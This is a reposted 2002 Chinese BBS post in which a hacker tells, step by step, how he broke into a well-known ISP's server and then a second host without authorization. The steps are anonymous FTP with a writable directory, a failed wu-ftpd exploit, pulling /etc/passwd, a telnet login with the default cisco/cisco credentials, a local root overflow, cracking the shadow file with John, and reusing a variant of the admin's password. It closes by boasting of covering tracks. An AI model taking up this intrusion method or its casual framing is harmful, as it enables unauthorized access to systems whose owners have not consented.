荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: shenjunjun (Shenjunjun), 信区: Security
标 题: 一个黑客网站的过程
发信站: 荔园晨风BBS站 (Mon Mar 18 20:04:44 2002), 转信
对一台国内著名ISP黑客的过程 ~ ~
------------------------------------------------------------------------
--------
saki 于 2002-3-7 15:21:40 加贴在 绿盟科技论坛(bbs.nsfocus.com)--CGI安全
:
/********************************************************************
*欢迎转载,转载请著名作者出处
*
*中国维安网 http://www.efocuscn.com
*
*unix 斑竹:saki
*win 斑竹: 核金融
*CGI 斑竹: 代聘中(你可以来申请!热烈欢迎! ~~¥~~)
*灌水 斑竹:command
*
*维安网邮件联系地址:webmaster@efocuscn.com
*
*欢迎大家踊跃发贴:
*http://www.efocuscn.com/bbs
********************************************************************/
实际上没有什么,只是看到咱们的BBS太过于冷清,发篇文章鼓舞一下人气。
有什么办法呢?这些斑竹都懒的出奇,竟然一个星期才进来看一下,令人绝倒。。
。。。
目的:
验证某著名ISP的主机安全
时间:
2001-10-某日
地点:
办公室电脑上
目标:
一个国内著名的ISP的区域主机
人物:
区区在下一人:saki
顺便说一句,中国的安全实在是差,配置的错误,也挺可怕。
过程:
对www.xxxx.com 主机先进行初始扫描,通常不会有太多有用的信息,手动的探测
才是实在的用处。
BTW:没有用上肉鸡,实在是并没有打算太快,太简单就搞定这台主机,毕竟这是
国内有名的XXX公司啊。。。呵呵
1、端口开放正常,并没有太多的多余端口打开;
21
23
80
2、查看主机的系统版本,很简单,只是:
telnet www.xxx.com
。。。。。
SUN OS 5.7
......
3、针对80端口进行了重点扫描,主要是想找到些远程的CGI漏洞,
扫描后,失败,CGI清空了,没有任何有利用价值的CGI漏洞。
4、查看FTP端口:
ftp www.xxx.com
。。。。。。。。
WELCOME XXX.COM .....WUFU-FTP2。4。16。。。。
.....
user: ftp
passwd:(xxx@2.com)
.....
user loged in.
ftp>
呵呵,能够匿名登入啊,WUFU-FTP2。4。16的版本有远程漏洞,不过需要可写权限
的。先查看一下子。
ftp> ls
user
tmp
welcome
bin
200 PORT Command successful.
ftp> cd tmp
200 PORT Command successful.
ftp>put c:\test.txt
xxxxxx....
200 PORT Command successful.
ftp>by
这烂站,tmp目录有可写权限,OK,LET‘S ROCK!
5、登陆到一个SUN OS 肉鸡上,编译了一个从自己的漏洞程序库中wufu-ftp2.4.
16的漏洞程序,并远程运行程序。
#./wuftp www.xxx.com /tmp ftp/ftp@2.com -p 120
connect.....
send shell....
wait for you shell....
..........
error.
#
没有反应,程序退出,没有出现SHELL。又试了几次,加大堆栈值,依旧没有成功
。
估计主机已打了补丁,这条线断了。
6、难道这个站点就进不去吗?根据经验,一定会有哪里有些小的疏忽,只是还没
有发现。let me think........
ZZZ#@#$#@~~~~ZZzzzzzZZ
到中午了,吃过了饭,睡一觉再说。
7、下午了,先去SINA去看了会新闻。
8、继续查看FTP服务,看有没有疏忽的。
ftp> ls
user
cisco
tmp
welcome
bin
200 PORT Command successful.
ftp > get /etc/passwd
xxxxx...
200 PORT Command successful.
(这里大家可能要问:没有出现etc目录,你瞎抓个什么劲啊?各位观众,这个是经
验,虽然没有显示etc目录,但你一定能够抓个passwd口令文件下来。)
查看/etc/passwd文件内容:
root:x:::::
ftp:::::
cisco:::::
9、直觉:cisco用户有问题,cisco设备老用些同样密码,这样的例子还少吗?如
果这台cisco是老设备的话。。。。
10、
telnet www.xxx.com
......
login:cisco
password:(空)
error.
login:cisco
password:cisco
user log in.
.............
cisco>
呵呵,成功。
11、找到SUN OS 5。7的本地溢出漏洞,编译、运行后成功获得ROOT 权限。
12、为了扩大战果,查看管理员xxshirt的.sh_history文件,看到一条:
telnet 211.xx.xx.xx
的指令。
对211.xx.xx.xx 主机扫描后,发现是LINUX主机,而且没有任何漏洞可以利用,只
开了21,21,80端口。
13、开动脑筋,开动脑筋,真正的HACKER是技术,更是头脑!!!
拿下www.xx.com 的shadow文件,拿到主机上,开 JOHN 开跑口令。
2分钟后找到xxshirt的口令:money02
14、一般的管理员会有在个服务器上用同一密码的习惯(恶习)!
telnet 211.xx.xx.xx
login:xxshirt
password:money02
error.
15、口令不对!恩。。。。let me think,这家伙还防了一手。根据密码心里学,
(呵呵。。是不是太玄了点。)即便密码不是同一密码,相似的可能性是很大的,
于是尝试:
telnet 211.xx.xx.xx
login:xxshirt
password:money
。。。。。
user log in.
$
16、成功突破,扩大了战果,得到了另一linux主机。
17、打扫卫生后,离开。
18、发封EMAIL告诉网管他们的BUG,并提出中肯的安全建议。(呵呵,这个时候心
里非常自豪~~)
saki 留白如下:
####################################################################
此次的攻击实际上根本原因是由于配置的基本错误引起的,因为这两台主机很重要
,没有动任何文件,没有查看资料,安全退出。
真正的HACKER是不会破坏,要的只是挑战!
同时,多思考,开动脑筋也是同样重要!
--
※ 修改:·jjksam 於 Mar 18 23:24:12 修改本文·[FROM: 192.168.0.146]
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 166.111.51.16]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店